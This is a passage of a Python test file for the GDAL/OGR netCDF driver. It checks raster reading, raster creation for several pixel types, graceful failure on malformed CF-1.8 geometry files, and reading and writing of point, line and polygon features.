assert ds.RasterXSize == 8
assert ds.RasterYSize == 4
assert ds.GetGeoTransform() == (-157.5, 38.3161193233344, 0.0, 67.5, 0.0, -38.3161193233344)
data = ds.GetRasterBand(1).ReadRaster()
data = struct.unpack('h' * 4 * 8, data)
    # not exactly the transposed array, but not far from it
assert data == (4, 8, 8, 12, 16, 20, 20, 24, 5, 9, 9, 13, 17, 21, 21, 25, 6, 10, 10, 14, 18, 22, 22, 26, 7, 11, 11, 15, 19, 23, 23, 27)
###############################################################################
# Test reading a netCDF file whose grid_mapping attribute uses an
# expanded form
def test_netcdf_expanded_form_of_grid_mapping():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/expanded_form_of_grid_mapping.nc')
wkt = ds.GetProjectionRef()
assert 'Transverse_Mercator' in wkt
###############################################################################
###############################################################################
# main tests list
###############################################################################
# basic file creation tests
init_list = [
('byte.tif', 4672, []),
('byte_signed.tif', 4672, ['PIXELTYPE=SIGNEDBYTE']),
('int16.tif', 4672, []),
('int32.tif', 4672, []),
('float32.tif', 4672, []),
('float64.tif', 4672, [])
]
# Some tests we don't need to do for each type.
@pytest.mark.parametrize(
'testfunction', [
'testSetGeoTransform',
'testSetProjection',
# SetMetadata() not supported
# 'testSetMetadata'
]
)
@pytest.mark.require_driver('netcdf')
def test_netcdf_functions_1(testfunction):
ut = gdaltest.GDALTest('netcdf', 'byte.tif', 1, 4672, options=["GEOMETRY_ENCODING=WKT"])
getattr(ut, testfunction)()
# Others we do for each pixel type.
@pytest.mark.parametrize(
'filename,checksum,options',
init_list,
ids=[tup[0].split('.')[0] for tup in init_list],
)
@pytest.mark.parametrize(
'testfunction', [
'testCreateCopy',
'testCreate',
'testSetNoDataValue'
]
)
@pytest.mark.require_driver('netcdf')
def test_netcdf_functions_2(filename, checksum, options, testfunction):
ut = gdaltest.GDALTest('netcdf', filename, 1, checksum, options=options)
getattr(ut, testfunction)()
###############################################################################
# simple geometry tests
# basic tests
def test_bad_cf1_8():
    # basic resilience test: make sure the driver fails "gracefully" on these malformed files;
    # if not, it will abort all tests
bad_geometry = ogr.Open("data/netcdf-sg/no_geometry_type.nc")
bad_feature = ogr.Open("data/netcdf-sg/bad_feature_test.nc")
missing_node_counts_test = ogr.Open("data/netcdf-sg/missing_node_counts_test.nc")
uneq_x_y = ogr.Open("data/netcdf-sg/unequal_xy.nc")
corrupt_poly_1 = ogr.Open("data/netcdf-sg/corrupted_polygon_ncpncir.nc")
corrupt_poly_2 = ogr.Open("data/netcdf-sg/corrupted_polygon_pnc.nc")
corrupt_poly_3 = ogr.Open("data/netcdf-sg/corrupted_polygon_ir.nc")
    # these errors are fatal to the open: each dataset must fail to open (return None)
assert(bad_geometry is None)
assert(bad_feature is None)
assert(missing_node_counts_test is None)
assert(corrupt_poly_1 is None)
assert(corrupt_poly_2 is None)
assert(corrupt_poly_3 is None)
assert(uneq_x_y is None)
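# Test reading a CF-1.8 simple geometry file containing 2D point features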
def test_point_read():
if gdaltest.netcdf_drv is None:
pytest.skip()
singleton_pt = ogr.Open("data/netcdf-sg/point_test.nc")
lc = singleton_pt.GetLayerCount()
assert(lc == 1)
layer = singleton_pt.GetLayerByName("names_geometry")
assert(layer != None)
# Test each geometry directly
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POINT (1 -1)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POINT (2 -2)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POINT (3 -3)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POINT (4 -4)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POINT (5 -5)")
def test_point3D_read():
if gdaltest.netcdf_drv is None:
pytest.skip()
singleton_pt = ogr.Open("data/netcdf-sg/point3D_test.nc")
lc = singleton_pt.GetLayerCount()
assert(lc == 1)
layer = singleton_pt.GetLayerByName("names_geometry")
assert(layer != None)
# Test each geometry directly
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POINT (1 -1 1)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POINT (2 -2 -2)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POINT (3 -3 3)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POINT (4 -4 -4)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POINT (5 -5 5)")
def test_multipoint_read():
if gdaltest.netcdf_drv is None:
pytest.skip()
multipoints = ogr.Open("data/netcdf-sg/multipoint_test.nc")
assert(multipoints != None)
lc = multipoints.GetLayerCount()
assert(lc == 1)
layer = multipoints.GetLayerByName("names_geometry")
assert(layer != None)
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (1 -1,2 -2,3 -3,4 -4)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (5 -5,6 -6,7 -7,8 -8)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (9 -9,10 -10,-1 1,-2 2)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (-3 3,-4 4,-5 5,-6 6)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (-7 7,-8 8,-9 9,-10 10)")
def test_multipoint3D_read():
if gdaltest.netcdf_drv is None:
pytest.skip()
multipoints = ogr.Open("data/netcdf-sg/multipoint3D_test.nc")
assert(multipoints != None)
lc = multipoints.GetLayerCount()
assert(lc == 1)
layer = multipoints.GetLayerByName("names_geometry")
assert(layer != None)
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (1 -1 1,2 -2 -2,3 -3 3,4 -4 -4)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (5 -5 5,6 -6 -6,7 -7 7,8 -8 -8)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (9 -9 9,10 -10 -10,-1 1 -1,-2 2 2)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (-3 3 -3,-4 4 4,-5 5 -5,-6 6 6)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (-7 7 -7,-8 8 8,-9 9 -9,-10 10 10)")
def test_line_read():
if gdaltest.netcdf_drv is None:
pytest.skip()
line = ogr.Open("data/netcdf-sg/line_test.nc")
assert(line != None)
lc = line.GetLayerCount()
assert(lc == 1)
layer = line.GetLayerByName("names_geometry")
assert(layer != None)
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "LINESTRING (1 -1,2 -2,3 -3,4 -4)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "LINESTRING (5 -5,6 -6,7 -7,8 -8)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "LINESTRING (9 -9,10 -10,-1 1,-2 2)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "LINESTRING (-3 3,-4 4,-5 5,-6 6)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "LINESTRING (-7 7,-8 8,-9 9,-10 10)")
def test_line3D_read():
if gdaltest.netcdf_drv is None:
pytest.skip()
line = ogr.Open("data/netcdf-sg/line3D_test.nc")
assert(line != None)
lc = line.GetLayerCount()
assert(lc == 1)
layer = line.GetLayerByName("names_geometry")
assert(layer != None)
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "LINESTRING (1 -1 1,2 -2 -2,3 -3 3,4 -4 -4)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "LINESTRING (5 -5 5,6 -6 -6,7 -7 7,8 -8 -8)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "LINESTRING (9 -9 9,10 -10 -10,-1 1 1,-2 2 -2)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "LINESTRING (-3 3 3,-4 4 -4,-5 5 5,-6 6 -6)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "LINESTRING (-7 7 7,-8 8 -8,-9 9 9,-10 10 -10)")
def test_multiline_read():
if gdaltest.netcdf_drv is None:
pytest.skip()
multiline = ogr.Open("data/netcdf-sg/multiline_test.nc")
assert(multiline != None)
lc = multiline.GetLayerCount()
assert(lc == 1)
layer = multiline.GetLayerByName("names_geometry")
assert(layer != None)
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTILINESTRING ((1 -1),(2 -2,3 -3,4 -4))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTILINESTRING ((5 -5,6 -6,7 -7,8 -8))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTILINESTRING ((9 -9,10 -10,-1 1),(-2 2))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTILINESTRING ((-3 3,-4 4),(-5 5,-6 6))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTILINESTRING ((-7 7,-8 8,-9 9,-10 10))")
def test_multiline3D_read():
if gdaltest.netcdf_drv is None:
pytest.skip()
multiline = ogr.Open("data/netcdf-sg/multiline3D_test.nc")
assert(multiline != None)
lc = multiline.GetLayerCount()
assert(lc == 1)
layer = multiline.GetLayerByName("names_geometry")
assert(layer != None)
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTILINESTRING ((1 -1 -1),(2 -2 2,3 -3 -3,4 -4 4))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTILINESTRING ((5 -5 -5,6 -6 6,7 -7 -7,8 -8 8))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTILINESTRING ((9 -9 -9,10 -10 10,-1 1 -1),(-2 2 2))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTILINESTRING ((-3 3 -3,-4 4 4),(-5 5 -5,-6 6 6))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTILINESTRING ((-7 7 -7,-8 8 8,-9 9 -9,-10 10 10))")
def test_polygon_read():
if gdaltest.netcdf_drv is None:
pytest.skip()
polygon = ogr.Open("data/netcdf-sg/polygon_test.nc")
assert(polygon != None)
lc = polygon.GetLayerCount()
assert(lc == 1)
layer = polygon.GetLayerByName("names_geometry")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POLYGON ((0 0,1 0,1 1,0 0))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POLYGON ((3 0,4 0,4 1,3 1,3 0))")
def test_polygon3D_read():
if gdaltest.netcdf_drv is None:
pytest.skip()
polygon = ogr.Open("data/netcdf-sg/polygon3D_test.nc")
assert(polygon != None)
lc = polygon.GetLayerCount()
assert(lc == 1)
layer = polygon.GetLayerByName("names_geometry")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POLYGON ((0 0 1,1 0 2,1 1 2,0 0 1))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POLYGON ((3 0 1,4 0 1,4 1 1,3 1 1,3 0 1))")
def test_multipolygon_read():
if gdaltest.netcdf_drv is None:
pytest.skip()
multipolygon = ogr.Open("data/netcdf-sg/multipolygon_test.nc")
assert(multipolygon != None)
lc = multipolygon.GetLayerCount()
assert(lc == 1)
layer = multipolygon.GetLayerByName("names_geometry")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOLYGON (((0 0,1 0,1 1,0 0)))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOLYGON (((3 0,4 0,4 1,3 0)),((3 0,4 1,3 1,3 0)))")
def test_multipolygon3D_read():
if gdaltest.netcdf_drv is None:
pytest.skip()
multipolygon = ogr.Open("data/netcdf-sg/multipolygon3D_test.nc")
assert(multipolygon != None)
lc = multipolygon.GetLayerCount()
assert(lc == 1)
layer = multipolygon.GetLayerByName("names_geometry")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOLYGON (((0 0 0,1 0 5,1 1 5,0 0 0)))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOLYGON (((3 0 5,4 0 10,4 1 10,3 0 5)),((3 0 10,4 1 15,3 1 15,3 0 10)))")
def test_serpenski_two_ring():
if gdaltest.netcdf_drv is None:
pytest.skip()
s = ogr.Open("data/netcdf-sg/serpenski_2nd.nc")
assert(s != None)
lc = s.GetLayerCount()
assert(lc == 1)
good_layer = s.GetLayerByName("serpenski")
assert(good_layer != None) # real layer
assert(good_layer.GetFeatureCount() == 1)
assert(good_layer.GetGeomType() == ogr.wkbMultiPolygon)
serpenski = good_layer.GetNextFeature()
triangle = serpenski.GetGeometryRef()
st_wkt = triangle.ExportToWkt()
assert(st_wkt == \
"MULTIPOLYGON (((0 0,1 0,0.5 0.866025403784439,0 0),(0.5 0.0,0.75 0.433012701892219,0.25 0.433012701892219,0.5 0.0)))")
def test_serpenski3D_two_ring():
if gdaltest.netcdf_drv is None:
pytest.skip()
s = ogr.Open("data/netcdf-sg/serpenski3D_2nd.nc")
assert(s != None)
lc = s.GetLayerCount();
assert(lc == 1)
good_layer = s.GetLayerByName("serpenski")
assert(good_layer != None) # real layer
assert(good_layer.GetFeatureCount() == 1)
assert(good_layer.GetGeomType() == ogr.wkbMultiPolygon25D)
serpenski = good_layer.GetNextFeature()
triangle = serpenski.GetGeometryRef()
st_wkt = triangle.ExportToWkt()
assert(st_wkt == \
"MULTIPOLYGON (((0 0 1,1 0 1,0.5 0.866025403784439 1,0 0 1),(0.5 0.0 1,0.75 0.433012701892219 1,0.25 0.433012701892219 1,0.5 0.0 1)))")
def test_flipped_axis():
if gdaltest.netcdf_drv is None:
pytest.skip()
# similar to simple polygon test, but with flipped axis
polygon = ogr.Open("data/netcdf-sg/flipped_axes_test.nc")
assert(polygon != None)
layer = polygon.GetLayerByName("names_geometry")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POLYGON ((0 0,1 0,1 1,0 0))")
def test_arbitrary_3Daxis_order_():
if gdaltest.netcdf_drv is None:
pytest.skip()
polygon = ogr.Open("data/netcdf-sg/arbitrary_axis_order_test.nc")
assert(polygon != None)
layer = polygon.GetLayerByName("names_geometry")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POLYGON ((0 0 1,1 0 2,1 1 2,0 0 1))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POLYGON ((3 0 1,4 0 1,4 1 1,3 1 1,3 0 1))")
def test_multiple_layers_one_nc():
if gdaltest.netcdf_drv is None:
pytest.skip()
    # tests whether a netCDF file with multiple geometry containers can be read,
    # with each geometry container exposed as its own layer
s = ogr.Open("data/netcdf-sg/multiple_containers.nc")
lc = s.GetLayerCount()
assert(lc == 2)
s_triangle = s.GetLayerByName("serpenski")
s_outline = s.GetLayerByName("serpenski_outline")
assert(s_triangle != None)
assert(s_outline != None)
triangle_ft = s_triangle.GetNextFeature()
triangle = triangle_ft.GetGeometryRef()
assert(triangle.GetGeometryType() == ogr.wkbMultiPolygon)
st_wkt = triangle.ExportToWkt()
assert(st_wkt == \
"MULTIPOLYGON (((0 0,1 0,0.5 0.866025403784439,0 0),(0.5 0.0,0.75 0.433012701892219,0.25 0.433012701892219,0.5 0.0)))")
outline_ft = s_outline.GetNextFeature()
outline = outline_ft.GetGeometryRef()
assert(outline.GetGeometryType() == ogr.wkbMultiLineString)
so_wkt = outline.ExportToWkt()
assert(so_wkt == \
"MULTILINESTRING ((0 0,1 0,0.5 0.866025403784439,0 0),(0.5 0.0,0.75 0.433012701892219,0.25 0.433012701892219,0.5 0.0))")
# advanced tests
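# Test reading Yahara_alb.nc: a multipolygon layer with attribute fields and an Albers Conic Equal Area SRS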
def test_yahara():
if gdaltest.netcdf_drv is None:
pytest.skip()
yahara = ogr.Open("data/netcdf-sg/Yahara_alb.nc")
assert(yahara != None)
y_layer = yahara.GetLayerByName("geometry_container")
assert(y_layer != None)
# Assert some basic properties
assert(y_layer.GetFeatureCount() == 71)
assert(y_layer.GetGeomType() == ogr.wkbMultiPolygon)
# Test getting a single feature through iteration
first = y_layer.GetNextFeature()
# Check fields are set correctly
assert(first.GetFieldAsInteger("ID") == 1)
assert(first.GetFieldAsInteger("GRIDCODE") == 55)
assert(first.GetFieldAsDouble("X_COORD") == 577251.43302)
assert(first.GetFieldAsDouble("Y_COORD") == 319799.04918)
# Check spatial ref is set correctly
fSRS = y_layer.GetSpatialRef()
assert(fSRS is not None)
assert(fSRS.ExportToWkt() == "PROJCS[\"unnamed\",GEOGCS[\"unknown\",DATUM[\"unnamed\",SPHEROID[\"Spheroid\",6378137,298.257223563]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433,AUTHORITY[\"EPSG\",\"9122\"]]],PROJECTION[\"Albers_Conic_Equal_Area\"],PARAMETER[\"latitude_of_center\",23],PARAMETER[\"longitude_of_center\",-96],PARAMETER[\"standard_parallel_1\",29.5],PARAMETER[\"standard_parallel_2\",45.5],PARAMETER[\"false_easting\",0],PARAMETER[\"false_northing\",0],UNIT[\"metre\",1,AUTHORITY[\"EPSG\",\"9001\"]],AXIS[\"Easting\",EAST],AXIS[\"Northing\",NORTH]]")
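# Test reading cf1.8_states.nc: feature count, ResetReading() behaviour and attribute fields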
def test_states_full_layer():
if gdaltest.netcdf_drv is None:
pytest.skip()
states = ogr.Open("data/netcdf-sg/cf1.8_states.nc")
assert(states != None)
s_layer = states.GetLayerByName("geometry_container")
assert(s_layer != None)
# Assert some basic properties (again)
assert(s_layer.GetFeatureCount() == 49)
assert(s_layer.GetGeomType() == ogr.wkbMultiPolygon)
# Test getting two features
first = s_layer.GetNextFeature()
second = s_layer.GetNextFeature()
# try resetting and then trying again
s_layer.ResetReading()
first_2 = s_layer.GetNextFeature()
# Did reset work correctly?
assert(first.Equal(first_2))
# Sanity check
assert(first.Equal(second) != True)
# Check fields are set correctly
assert(second.GetFieldAsString("STATE_NAME") == "Montana")
assert(second.GetFieldAsInteger("DRAWSEQ") == 3)
assert(second.GetFieldAsString("STATE_FIPS") == "30")
assert(second.GetFieldAsString("STATE_ABBR") == "MT")
###############################################################################
# simple geometry writing tests
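# Test writing 2D point features from GeoJSON to netCDF and reading them back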
def test_point_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/point_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
gdal.VectorTranslate("tmp/test_point_write.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/test_point_write.nc")
    assert(nc_tsrc is not None)
    assert(nc_tsrc.GetLayerCount() == 1)
# Test layer properties
layer = nc_tsrc.GetLayerByName("point_collection")
assert(layer is not None)
assert(layer.GetFeatureCount() == 4)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (0.5 -0.5)")
assert(fnam == "FishingSpot1")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (1 -1)")
assert(fnam == "FishingSpot2")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (1.5 -1.5)")
assert(fnam == "FishingSpot3")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (2 -2)")
assert(fnam == "FishingSpot4")
def test_point3D_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/point3D_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
gdal.VectorTranslate("tmp/test_point3D_write.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/test_point3D_write.nc")
    assert(nc_tsrc is not None)
    assert(nc_tsrc.GetLayerCount() == 1)
# Test layer properties
layer = nc_tsrc.GetLayerByName("point_collection")
assert(layer is not None)
assert(layer.GetFeatureCount() == 4)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (0.5 -0.5 -1.5)")
assert(fnam == "FishingSpot1")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (1 -1 -0.5)")
assert(fnam == "FishingSpot2")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (1.5 -1.5 0.5)")
assert(fnam == "FishingSpot3")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (2 -2 1.5)")
assert(fnam == "FishingSpot4")
def test_line_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/line_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/line_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/line_write_test.nc")
    assert(nc_tsrc is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("segv")
assert(layer is not None)
assert(layer.GetFeatureCount() == 3)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "LINESTRING (1.5 -1.5)")
assert(fnam == "seg1")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "LINESTRING (30.5 30.5,5 5)")
assert(fnam == "seg2")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "LINESTRING (9 -9,10 -10,-1 1)")
assert(fnam == "seg3")
def test_line3D_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/line3D_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/line3D_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/line3D_write_test.nc")
    assert(nc_tsrc is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("path")
assert(layer is not None)
assert(layer.GetFeatureCount() == 3)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "LINESTRING (0.1 0.2 0.3,99 -99 0)")
assert(fnam == "path1")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "LINESTRING (100 101 102,25 27 29)")
assert(fnam == "path2")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "LINESTRING (7 -11 -7,-11 7 11,-6 1945 1918)")
assert(fnam == "path3")
def test_polygon_no_ir_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/polygon_no_ir_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/polygon_no_ir_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/polygon_no_ir_write_test.nc")
    assert(nc_tsrc is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("noir_write")
assert(layer is not None)
assert(layer.GetFeatureCount() == 2)
# Test each feature manually
    # With no interior rings involved, these features are read back as simple Polygons
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POLYGON ((0 0,1 0,1 1,0 0))")
assert(fnam == "Triangle")
    # The second feature is a simple square (again without an interior ring)
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POLYGON ((3 0,4 0,4 1,3 1,3 0))")
assert(fnam == "Square")
def test_polygon_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/polygon_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/polygon_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/polygon_write_test.nc")
    assert(nc_tsrc is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("shapes")
assert(layer is not None)
assert(layer.GetFeatureCount() == 3)
# Test each feature manually
    # Due to ambiguities present in CF-1.8, these are actually read out as Multipolygons, not Polygons,
    # but when being written out they are OGRFeature POLYGON
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((0 0,1 0,1 1,0 0)))")
assert(fnam == "Triangle")
# This second feature has an interior ring in it
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((3 0,4 0,4 1,3 1,3 0),(3.5 0.25,3.75 0.25,3.75 0.5,3.5 0.5,3.5 0.25)))")
assert(fnam == "Square_in_Square")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
